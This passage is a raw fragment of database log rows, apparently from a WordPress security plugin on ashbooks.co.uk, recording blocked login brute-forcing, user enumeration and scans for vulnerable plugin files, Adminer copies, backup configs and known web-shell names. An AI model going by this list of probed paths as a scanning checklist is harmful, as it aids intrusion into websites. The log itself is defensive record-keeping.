2l7JkVju1vUqzKMSIZ5gmi','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('139.224.198.47',2346763823,'admin',0,1636550240.9388,7,'dGHL8vNnQzbMj3iKu5XWtwk4','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.189.138.128',96307840,'admin',0,1636551057.4263,7,'gWeV9qPMzYxSvubnGUTy8p5C','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('72.167.42.45',1218914861,'admin',0,1636551785.6118,7,'UxHzlSsJbaDRKM0CTQ6P9A7g','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.76',96222796,'ashbooks',0,1636551814.0874,51,'dW62oFgnpvR5Ib3QzkumSEiL','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('34.147.103.188',580085692,'admin',0,1636552569.9459,7,'EXw4hyfec3BJn1aCtSvpVYjM','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.115.120.54',343111734,'',0,1636552657.0818,70,'QCox8tIGShALj4UBY37vsbKq','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('20.115.120.54',343111734,'admin',0,1636552661.3644,7,'qpgKR5F30r2QNS1IUjJl6v8x','','0|0|0|0|ashbooks.co.uk//wp-login.php'),('61.12.67.132',1024213892,'admin',0,1636553297.5156,7,'eauOLKnWQBGwiPkRXsY1ylzJ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('75.119.144.140',1266126988,'admin',0,1636554088.7351,7,'lydr3Qe2sEBtWnTfuc8VUx0O','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('64.20.39.18',1075062546,'',0,1636554568.8808,70,'iqVMjQ3d7UrKuZJcF02kntEx','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('20.115.120.54',343111734,'',0,1636554816.9285,55,'ZxMQ1hvPfnsJAWC40yiGUHgu','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php'),('20.115.120.54',343111734,'',0,1636554845.4466,55,'Z6kYBlomJXaUxFeqDM4vPE81','','19|0|0|0|ashbooks.co.uk/wp-admin/vuln.php'),('35.236.172.75',602713163,'admin',0,1636554845.4917,7,'AyTzao58wxsE93UvD2bGhHCj','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.115.120.54',343111734,'',0,1636554930.2826,55,'k7iQsXUy3ClEcPLqIb0NHA24','','19|0|0|0|ashbooks.co.uk/wp-content/force-download.php'),('20.115.120.54',343111734,'',0,1636554930.8285,55,'PzGULgdnpZYucKsvIJWo76b3','','19|0|0|0|ashbooks.co.uk/force-download.php'),('20.115.120.54',343111734,'',0,1636554931.6713,55,'oG6Rjm3D2Zzta4WMOvB05NHi','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php'),('20.115.120.54',343111734,'',0,1636554931.7170,10,'oG6Rjm3D2Zzta4WMOvB05NHi','','707|0|0|0|ashbooks.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php'),('20.115.120.54',343111734,'',0,1636554932.0195,50,'QlfMqNaeXZAYPx8m74LzCUEd','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.115.120.54',343111734,'',0,1636554932.8027,100,'cpEM8z1V7dSeLuNl6PFHK43o','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/google-mp3-audio-player/direct_download.php'),('20.115.120.54',343111734,'',0,1636554932.8088,100,'Eg0G7YlXpi3mUuWZok6RfdFz','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/google-document-embedder/libs/pdf.php'),('20.115.120.54',343111734,'',0,1636554932.8894,100,'GiXTOIevEuys2xz6dqcfVbRa','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php'),('20.115.120.54',343111734,'',0,1636554932.8905,50,'zA4biLKlf5uetnXhN3RFk8Q2','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.115.120.54',343111734,'',0,1636554933.5774,100,'JUigSfDudxesH05Y178mZIFj','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php'),('20.115.120.54',343111734,'',0,1636554933.9195,100,'5u4xsne3i1qUXzObQkCaTDJ6','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/recent-backups/download-file.php'),('20.115.120.54',343111734,'',0,1636554935.0973,100,'t0S7LEVHdGIuKYjxWAka3s45','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/simple-image-manipulator/controller/download.php'),('20.115.120.54',343111734,'',0,1636554935.6727,100,'1AlPFDQXdjbYLgz4Tf9cp60r','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/sniplets/modules/syntax_highlight.php'),('20.115.120.54',343111734,'',0,1636554936.6221,100,'EPGm6ChXFLdRgBueMS87rQJV','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/tera-charts/charts/treemap.php'),('20.115.120.54',343111734,'',0,1636554937.0588,100,'Ieh3wz4NHJ0q8W6mAsCLTvOb','','13|0|0|0|ashbooks.co.uk/wp-content/themes/churchope/lib/downloadlink.php'),('20.115.120.54',343111734,'',0,1636554938.2240,100,'kc8ep2sjCl5VbrZ9dwFnoST4','','13|0|0|0|ashbooks.co.uk/wp-content/themes/mTheme-Unus/css/css.php'),('20.115.120.54',343111734,'',0,1636554938.2712,100,'kmTlA9K3S4uOIqVyjnCfM7QY','','13|0|0|0|ashbooks.co.uk/wp-content/themes/NativeChurch/download/download.php'),('20.115.120.54',343111734,'',0,1636554939.6693,100,'NIlpt85dJqB04xKQakoXfve9','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ungallery/source_vuln.php'),('20.115.120.54',343111734,'',0,1636554939.7719,100,'Gjp6T2EeqZIdnDuUk8B9bvKh','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php'),('20.115.120.54',343111734,'',0,1636554941.2196,100,'oGYmaV6uxpWXtDk7ZSRiBw8q','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php'),('20.115.120.54',343111734,'',0,1636554941.2548,100,'bhq5GkZmjpi0A1LTxC28346a','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/db-backup/download.php'),('20.115.120.54',343111734,'',0,1636554943.7463,100,'U62Bzc5bus8WkMETPpdaVROt','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/mac-dock-gallery/macdownload.php'),('20.115.120.54',343111734,'',0,1636554958.7037,55,'70NInA1eZp8OlDXKwrP2FhbL','','19|0|0|0|ashbooks.co.uk/adminer.php'),('20.115.120.54',343111734,'',0,1636554958.9687,55,'KkwafgV38yMhT76ujOczoGCd','','19|0|0|0|ashbooks.co.uk/wp-admin/mysql-adminer.php'),('20.115.120.54',343111734,'',0,1636554958.9898,55,'YPqUZT6RHt8mDIQfAzXdu1x7','','19|0|0|0|ashbooks.co.uk/wp-admin/adminer.php'),('20.115.120.54',343111734,'',0,1636554959.9861,55,'Amb95cK6pR7jakHZNgCMVi0U','','19|0|0|0|ashbooks.co.uk/adminer/adminer.php'),('20.115.120.54',343111734,'',0,1636554959.9959,55,'edb5XfVxNsvUtqLr8IpQHugR','','19|0|0|0|ashbooks.co.uk/mysql-adminer.php'),('20.115.120.54',343111734,'',0,1636554960.1549,55,'6Idzh1RJVwOHvuFnW8lpq7TA','','19|0|0|0|ashbooks.co.uk/uploads/adminer.php'),('20.115.120.54',343111734,'',0,1636554960.7239,55,'VpacrW8KqCDeOdgGNQH3o4Im','','19|0|0|0|ashbooks.co.uk/upload/adminer.php'),('20.115.120.54',343111734,'',0,1636554960.8375,55,'iDQyZvHaPId5xLCJhpWcOmM2','','19|0|0|0|ashbooks.co.uk/adminer/adminer-4.7.0.php'),('20.115.120.54',343111734,'',0,1636554961.2252,55,'HXrQC2VAZWfiw7z6UKYxuIRN','','19|0|0|0|ashbooks.co.uk/wp-content/adminer.php'),('20.115.120.54',343111734,'',0,1636554962.1859,55,'Engyz1a8q3H2VL0CS4MAJUNG','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/adminer/inc/editor/index.php'),('20.115.120.54',343111734,'',0,1636554962.4397,55,'prjASutMa1oGQnwXFsYcZhDg','','19|0|0|0|ashbooks.co.uk/wp-content/uploads/adminer.php'),('20.115.120.54',343111734,'',0,1636554962.7635,55,'cgCeqEL7k6imWS2XR3MxVO9w','','19|0|0|0|ashbooks.co.uk/_adminer.php'),('20.115.120.54',343111734,'',0,1636554963.7814,55,'X3DscR0d7o5AmYaUK98zE2Vt','','19|0|0|0|ashbooks.co.uk/mirasvit_adminer_mysql.php'),('20.115.120.54',343111734,'',0,1636554964.4130,55,'vt1a5b2AXsdTJkRqeVDnGwz7','','19|0|0|0|ashbooks.co.uk/mirasvit_adminer_425.php'),('20.115.120.54',343111734,'',0,1636554964.6469,55,'YcKUgI8LnRewdqWEuP1DH9O4','','19|0|0|0|ashbooks.co.uk/adminer1.php'),('20.115.120.54',343111734,'',0,1636554965.1692,55,'P8L2BXsMnFevQSNhwJZztGjW','','19|0|0|0|ashbooks.co.uk/adminer/index.php'),('20.115.120.54',343111734,'',0,1636554966.5345,55,'jmosKMlTC9qgWND4eSVYyXGc','','19|0|0|0|ashbooks.co.uk/mirasvit_adminer_431.php'),('20.115.120.54',343111734,'',0,1636554967.5234,55,'g6WxHkSTMo0ZlcBjvdXfG1Nw','','19|0|0|0|ashbooks.co.uk/mirasvit_adminer-4.2.3.php'),('20.115.120.54',343111734,'',0,1636554967.8271,55,'iOrt2FEDmwvc0Gs3RH1IoxW4','','19|0|0|0|ashbooks.co.uk/adminer-4.6.2-cs.php'),('20.115.120.54',343111734,'',0,1636554967.8799,55,'74lDqzVMZRk9Qb8WfeCuiOpT','','19|0|0|0|ashbooks.co.uk/adminer-4.5.0.php'),('20.115.120.54',343111734,'',0,1636554968.7178,55,'dU3iSBPkabvZr6XYVsfO92o0','','19|0|0|0|ashbooks.co.uk/adminer-4.3.0.php'),('20.115.120.54',343111734,'',0,1636554969.0508,55,'FcBDntS0XiUs5VfZvPyzM1wQ','','19|0|0|0|ashbooks.co.uk/latest.php'),('20.115.120.54',343111734,'',0,1636554971.4994,55,'tDEl4JVWkxRKq0CYd6ZNTuAI','','19|0|0|0|ashbooks.co.uk/latest-mysql.php'),('20.115.120.54',343111734,'',0,1636554971.6236,55,'H7fKlXSI3U6Y1rPxv4wtCnGj','','19|0|0|0|ashbooks.co.uk/latest-en.php'),('20.115.120.54',343111734,'',0,1636554971.7170,55,'xAsnYR0VOrNH1JowB63FcEqX','','19|0|0|0|ashbooks.co.uk/latest-mysql-en.php'),('20.115.120.54',343111734,'',0,1636554972.3916,55,'2IXvTy5cGKu0jO1eo86zHktQ','','19|0|0|0|ashbooks.co.uk/adminer-4.7.0.php'),('20.115.120.54',343111734,'',0,1636554979.9435,100,'hDUfpbWN1axoIFkXEA07wLlm','','13|0|0|0|ashbooks.co.uk/'),('20.115.120.54',343111734,'',0,1636555051.8405,55,'tFluNVq3hCKk4jsRLfEYiarx','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/formcraft/file-upload/server/content/upload.php'),('20.115.120.54',343111734,'',0,1636555084.1921,70,'Y6FRwSjuNxbToZUIWVcaBvEf','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/posts/'),('20.115.120.54',343111734,'',0,1636555087.8265,70,'rRm2VQ5qM8kxzDvtfi4w93XK','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/posts/None'),('20.115.120.54',343111734,'',0,1636555104.4835,55,'yP1r4Vg0SGwm65xqEhjO8Jik','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/hd-webplayer/playlist.php'),('20.115.120.54',343111734,'',0,1636555133.8840,55,'TPvoG5thNaYnlVWr9iU2SAJR','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/viral-optins/api/uploader/file-uploader.php'),('20.115.120.54',343111734,'',0,1636555141.0691,100,'ACY7FiZejGlvM8wfcPp5WTE4','','13|0|0|0|ashbooks.co.uk/wordpress/wp-admin/setup-config.php'),('20.115.120.54',343111734,'',0,1636555144.4335,100,'stlrbN6wEYBufxvkSmK2InJq','','13|0|0|0|ashbooks.co.uk/wp/wp-admin/setup-config.php'),('20.115.120.54',343111734,'',0,1636555147.6475,100,'lfJwtXZMLzpBEKsvPdq3Sjyh','','13|0|0|0|ashbooks.co.uk/blog/wp-admin/setup-config.php'),('20.115.120.54',343111734,'',0,1636555151.8906,100,'2GxZAehobwOHmrdiKt7yLBEY','','13|0|0|0|ashbooks.co.uk/test/wp-admin/setup-config.php'),('20.115.120.54',343111734,'',0,1636555155.4444,100,'1HEU5wodsNKOqDBjxWzQ3cml','','13|0|0|0|ashbooks.co.uk/site/wp-admin/setup-config.php'),('20.115.120.54',343111734,'',0,1636555158.1574,100,'UI7qcFHlfwiRD49jv1z62YAs','','13|0|0|0|ashbooks.co.uk/fckeditor/editor/filemanager/connectors/php/upload.php'),('20.115.120.54',343111734,'',0,1636555189.5008,70,'H97rLKQIoBx2lhwJG10yMaq3','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/1'),('20.115.120.54',343111734,'',0,1636555192.2366,70,'Qso7GMjxa3Vqrh0iRNzPbucI','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/2'),('20.115.120.54',343111734,'',0,1636555194.7526,70,'DZc0pTqHzmjrbtFV95Uy2YBQ','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/3'),('20.115.120.54',343111734,'',0,1636555197.0569,70,'sH6WoQg0d8Vwrx5fy7qOAhpn','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/4'),('20.115.120.54',343111734,'',0,1636555199.0320,70,'iOVyX3xMUAu2RT4Bf7NtzZn5','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/5'),('20.115.120.54',343111734,'',0,1636555202.0322,70,'AMUsgoapyqSOwW0DT6LkGmX7','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/6'),('20.115.120.54',343111734,'',0,1636555204.9555,70,'v8g2aXIbQrpuM7iSsm0kyB6V','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/7'),('20.115.120.54',343111734,'',0,1636555206.9757,70,'CNnxPqolcyuIZzhEKms2S4LA','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/8'),('20.115.120.54',343111734,'',0,1636555209.0775,70,'ruS9OzK53fpWnZh2bdjCtGyo','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/9'),('20.115.120.54',343111734,'',0,1636555211.5299,70,'GW36jp2MkCDEAZ5vKYg1TLiz','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/10'),('20.115.120.54',343111734,'',0,1636555220.5915,50,'ubtyfOR3NXvo8SJHnAqPph74','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.115.120.54',343111734,'',0,1636555220.7362,50,'g6edlRc8knvIHXbYx3VQrSfa','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.115.120.54',343111734,'',0,1636555221.0944,50,'CnSi3rR09QksTMg7D8cBZ2dw','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.115.120.54',343111734,'',0,1636555221.0959,50,'iIA48kzldSZOoDpTe07J2nsY','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.115.120.54',343111734,'',0,1636555221.1445,50,'0N8T6LQErpbScZvXReduKHOj','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('111.231.206.201',1877462729,'admin',0,1636555626.9786,7,'5RbBkgeWs4qp8vZrlAIwCaFM','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.76',96222796,'ashbooks',0,1636562395.9513,51,'8xhqBW72In9KROlZbDXjit5f','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('91.176.123.228',1538292708,'ashbooks',0,1636570793.4280,51,'mOJB628NgW1f7sUkQM3cDujA','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('186.179.100.93',3132318813,'ashbooks',0,1636570803.4920,51,'uleoQ9cdTx3LWqFs76Mbn0Dr','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('200.241.39.37',3371247397,'ashbooks',0,1636571020.3366,51,'4fh6XrxLetM0UzHVIab7B31F','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('138.207.154.32',2328861216,'ashbooks',0,1636571163.5151,51,'TSljrOkcqfm9i60EBNvGWAeV','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('119.46.166.118',1999545974,'ashbooks',0,1636571275.3560,51,'NDzVt1T75KJkyE84bPdwYHXM','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('190.3.205.213',3187920341,'ashbooks',0,1636571337.8598,51,'IYWQ6dHET1ChAZ20PGFKe4L3','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.76',96222796,'ashbooks',0,1636573012.3143,51,'u9hAX8wYPHdDWliybazNxoM3','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('104.37.84.5',1747276805,'admin',0,1636581191.3672,7,'mTOQVukjUw0z8nFG5bEKCcS7','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.76',96222796,'ashbooks',0,1636583606.9740,51,'HDjMhEywmBtuAeGFfc9P8OZC','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('217.160.192.178',3651190962,'',0,1636587267.2754,55,'FOxKoTAm96tBvLEn3kgNDeJc','','19|0|0|0|ashbooks.co.uk/style.php'),('217.160.192.178',3651190962,'',0,1636587270.8642,55,'fltiSqZgYmvGwbX7cAdr5QnF','','19|0|0|0|ashbooks.co.uk/moduless.php'),('217.160.192.178',3651190962,'',0,1636587275.9225,55,'3o1hZeDGtfibIqTBVFNAvau2','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('217.160.192.178',3651190962,'',0,1636587281.7621,55,'6kFDW5pLEBjedrOCTfbUx4qS','','19|0|0|0|ashbooks.co.uk/admin.php'),('217.160.192.178',3651190962,'',0,1636587297.0414,55,'691MCOKfIGhkVFw3rvgnRbyX','','19|0|0|0|ashbooks.co.uk/boom.php'),('217.160.192.178',3651190962,'',0,1636587297.0749,10,'691MCOKfIGhkVFw3rvgnRbyX','','707|0|0|0|ashbooks.co.uk/boom.php'),('217.160.192.178',3651190962,'',0,1636587301.0440,55,'h4frEkH1LAenaIW5g9YMlyXu','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('217.160.192.178',3651190962,'',0,1636587305.6311,55,'aFdjrKQtqnsHRDW5bmuw1lpE','','19|0|0|0|ashbooks.co.uk/wp-content/db_cache.php'),('217.160.192.178',3651190962,'',0,1636587310.1200,100,'mLZ0FQxpRATgG7yKUuv4zCeM','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('217.160.192.178',3651190962,'',0,1636587320.7758,100,'JnS9tjKLzkUTcg34vdIrWXuR','','13|0|0|0|ashbooks.co.uk/wpindex.php'),('217.160.192.178',3651190962,'',0,1636587325.5729,100,'D1Wu7MI6sfvEtcG8Cq2ObUlA','','13|0|0|0|ashbooks.co.uk/larva.php'),('217.160.192.178',3651190962,'',0,1636587330.4910,100,'OAK6WQk1EBawiopfdz9Tmn7S','','13|0|0|0|ashbooks.co.uk/th3_err0r.php'),('217.160.192.178',3651190962,'',0,1636587334.4959,55,'ENSI1HOxXjgpomP9h5DQlBYb','','19|0|0|0|ashbooks.co.uk/alfindex.php'),('217.160.192.178',3651190962,'',0,1636587338.2261,55,'4LZGvDuhA5poYjkSB7cRsfqP','','19|0|0|0|ashbooks.co.uk/alfa.php'),('217.160.192.178',3651190962,'',0,1636587342.3598,55,'LGaSArElFsHU09zo7pIPMwnc','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('217.160.192.178',3651190962,'',0,1636587346.9926,55,'t74hGwVATqE1pvmg8LJsI2Nd','','19|0|0|0|ashbooks.co.uk/cindex.php'),('217.160.192.178',3651190962,'',0,1636587350.9250,55,'0rxADtBn4f5Pg1dSuh2OKjFw','','19|0|0|0|ashbooks.co.uk/wp-content/wp-1ogin_bak.php'),('217.160.192.178',3651190962,'',0,1636587355.7201,55,'9aVP0SK8JIDerlyuTOXito26','','19|0|0|0|ashbooks.co.uk/wp-1ogin_bak.php'),('217.160.192.178',3651190962,'',0,1636587360.3304,55,'ZoLb1riFv8XzhckIfNxMdHP2','','19|0|0|0|ashbooks.co.uk/wp-includes/fonts/css.php'),('217.160.192.178',3651190962,'',0,1636587364.9046,55,'MwqA6uzXo7H4R50UYW3mFjtT','','19|0|0|0|ashbooks.co.uk/wp-includes/css/css.php'),('217.160.192.178',3651190962,'',0,1636587370.2035,55,'D4RYBJ9rEqIwNtZV5hWbKoLx','','19|0|0|0|ashbooks.co.uk/old-index.php'),('217.160.192.178',3651190962,'',0,1636587374.5269,55,'3Cl0ztaZEfmY1oribgVQcF4x','','19|0|0|0|ashbooks.co.uk/config.bak.php'),('217.160.192.178',3651190962,'',0,1636587378.7951,55,'Du1CtAoMK54YpWZUnEFwLqJO','','19|0|0|0|ashbooks.co.uk/wp-admin/config.bak.php'),('217.160.192.178',3651190962,'',0,1636587384.9206,55,'6f1bMezFC7kT3HLZmJSuXoP0','','19|0|0|0|ashbooks.co.uk/wp-content/config.bak.php'),('217.160.192.178',3651190962,'',0,1636587390.8843,55,'bsK1ZVO0LpA6ofN2GnMhvcXl','','19|0|0|0|ashbooks.co.uk/wp-includes/config.bak.php'),('217.160.192.178',3651190962,'',0,1636587394.2568,55,'sEiT1oN0Ic2nAUPfOdrR3xCk','','19|0|0|0|ashbooks.co.uk/wp-content/themes/config.bak.php'),('217.160.192.178',3651190962,'',0,1636587398.5453,55,'OUXR1juq8Sya39TfnNV5vHAQ','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/config.bak.php'),('217.160.192.178',3651190962,'',0,1636587401.7273,18,'kdDCu4cg0fIlJUQNtVEeX8sW','','13|0|0|0|ashbooks.co.uk/wp-includes/css/wp-config.php'),('217.160.192.178',3651190962,'',0,1636587405.1093,55,'jhpfYm1q5FJgWDvGVS8e6K03','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('217.160.192.178',3651190962,'',0,1636587409.3338,100,'HLO8ty6GBxU7e4d0NFivz9Tn','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('217.160.192.178',3651190962,'',0,1636587413.5055,100,'mSQdWY6wz9ckJKhFVl8OaECp','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php'),('217.160.192.178',3651190962,'',0,1636587417.6426,55,'mPJTUhtvxigVWfM8IqBdsayF','','19|0|0|0|ashbooks.co.uk/haders.php'),('217.160.192.178',3651190962,'',0,1636587422.4560,100,'WiqkmIB8pZclJaQENng0TDXh','','13|0|0|0|ashbooks.co.uk/wp-content/wp-old-index.php'),('217.160.192.178',3651190962,'',0,1636587425.5547,55,'xu5Mz8i2FDIRJkZ0nEKUdwjt','','19|0|0|0|ashbooks.co.uk/legion.php'),('217.160.192.178',3651190962,'',0,1636587430.7983,55,'dntgDr62BqoHvlbAjKeyZhzL','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('217.160.192.178',3651190962,'',0,1636587434.4613,55,'qFuZPJ27Yj5xeVXDrEz0TiSK','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('217.160.192.178',3651190962,'',0,1636587438.1953,55,'z7hyXCnmWIJ29VSbjUGoFrME','','19|0|0|0|ashbooks.co.uk/wp-includes/small.php'),('217.160.192.178',3651190962,'',0,1636587441.6370,55,'0xjunYAFIEiwpCNJ6Lm9Rrvy','','19|0|0|0|ashbooks.co.uk/up.php'),('217.160.192.178',3651190962,'',0,1636587445.5206,55,'AUketIju3p4ZmE5ycbhJn0sG','','19|0|0|0|ashbooks.co.uk/upload.php'),('217.160.192.178',3651190962,'',0,1636587449.4323,55,'yUZb1PjV7J5vqigCOD2s9kwn','','19|0|0|0|ashbooks.co.uk/config.php'),('217.160.192.178',3651190962,'',0,1636587453.2500,100,'pwmTUizOXcMRahNlV2ugeZy9','','13|0|0|0|ashbooks.co.uk/test.php'),('217.160.192.178',3651190962,'',0,1636587456.8370,55,'l5N7zS6Jv1P3WgUVnHTXOAbM','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('217.160.192.178',3651190962,'',0,1636587460.9422,55,'eyMt4hgou5n8wABlX3IzJW2k','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('217.160.192.178',3651190962,'',0,1636587465.5619,55,'7SgE0OefRGu2Nk6YDAxTsUH5','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'),('82.208.189.233',1389411817,'',0,1636589984.8506,55,'j8LW4mFSRENQtfx57qHrZMa2','','19|0|0|0|ashbooks.co.uk/xmrlpc.php'),('5.188.62.76',96222796,'ashbooks',0,1636594184.3623,51,'5Q24cTEl9UNdpGkMHjnyg610','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.238.75.78',3119401806,'admin',0,1636604099.2731,7,'1VJUNjG0TKI8OYsDRbWS5tv6','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.76',96222796,'ashbooks',0,1636604769.1486,51,'ZPJcC3YFr96N0VEQfKhTmAoX','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.9.57.242',84490738,'',0,1636605083.0032,70,'7Y0nDd8MVG63uybczCigAfRv','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('82.208.189.233',1389411817,'',0,1636605489.7500,55,'JKFR7ucqaU6dXYE13WwLDBI4','','19|0|0|0|ashbooks.co.uk/1index.php'),('3.127.83.243',58676211,'admin',0,1636610010.4320,7,'CEYwK4lWRQNkapeZ1SAiUdqm','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('116.203.244.229',1959523557,'admin',0,1636610831.0764,7,'dOxmhXysVNv2afinG38KMt5w','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.253.62.82',100482642,'admin',0,1636612228.5815,7,'HsEGIFyYijAkt5xgdcP9pWXn','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('109.87.200.193',1834469569,'admin',0,1636612917.1494,7,'qwRfL4x6IrT13GlnAHhgNisV','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('144.76.102.246',2420926198,'admin',0,1636613657.4726,7,'4RA7EOftZkm0qGnuzHJcDUIr','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.163.225.120',1168367992,'admin',0,1636614483.1919,7,'x1gYtoI9SlUV0iAe8LFBCT6Q','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.76',96222796,'ashbooks',0,1636615368.4986,51,'8OGk4U6egL9FD3ZQ0Yj5bwEv','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.88.38.58',391652922,'admin',0,1636615949.0023,7,'5VXrmMoIpRKZt7znDGyesw9S','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('184.72.185.46',3091773742,'admin',0,1636617332.3841,7,'g80FtkNK1GIhO3X2CuBaU5oz','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.40.166.141',757638797,'admin',0,1636618076.1739,7,'RZonmrlb5yHgTPuiL4FEqsSM','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.39.95.36',86466340,'admin',0,1636618770.4152,7,'TAevUCLIgHZMx7lPkzsutSXh','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('144.76.102.246',2420926198,'admin',0,1636619498.0193,7,'CXdmvIi8SLFKEBNrMQkRVUZ1','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('95.217.195.206',1608106958,'admin',0,1636620283.0247,7,'yHZeRG2kxthEjPqpsBOALMUK','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.40.166.142',757638798,'admin',0,1636621080.8794,7,'0VGakfXo7dW2C9ipF8J5PzMv','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.240.16.237',2733641965,'admin',0,1636622680.8630,7,'4AS8N9sWhEcpku65zDXo0nm2','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('176.109.191.65',2959982401,'',0,1636623287.6601,55,'n8jvNYQpxCbutGa2i1KDqRkW','','19|0|0|0|ashbooks.co.uk/wp-content/themes/sketch/404.php'),('20.185.234.76',347728460,'',0,1636623458.3113,70,'SicPpCgMeUjBGIQu19Nq563h','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('167.172.69.81',2813085009,'admin',0,1636623460.2617,7,'8yvWzr2eI1RlxAJ5MTcGU0ON','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'admin',0,1636623463.6302,7,'0t6dhFyep5NfJgW12jZqYMcI','','0|0|0|0|ashbooks.co.uk//wp-login.php'),('20.112.113.120',342913400,'',0,1636624524.0728,55,'zbXnVOpHrDk9RNuSeL35dsWa','','19|0|0|0|ashbooks.co.uk/wp-includes/css/modules.php'),('20.112.113.120',342913400,'',0,1636624550.9729,55,'97EckgWuxm4dIz30qKR2pNv8','','19|0|0|0|ashbooks.co.uk/wso.php'),('20.112.113.120',342913400,'',0,1636624576.8242,55,'mLIgNZ3we5RKQS8XuEGlBqPs','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/upspy/index.php'),('20.112.113.120',342913400,'',0,1636624601.4500,55,'UhAbDvNfEZHLrCseunBFgmOi','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/index.php'),('20.112.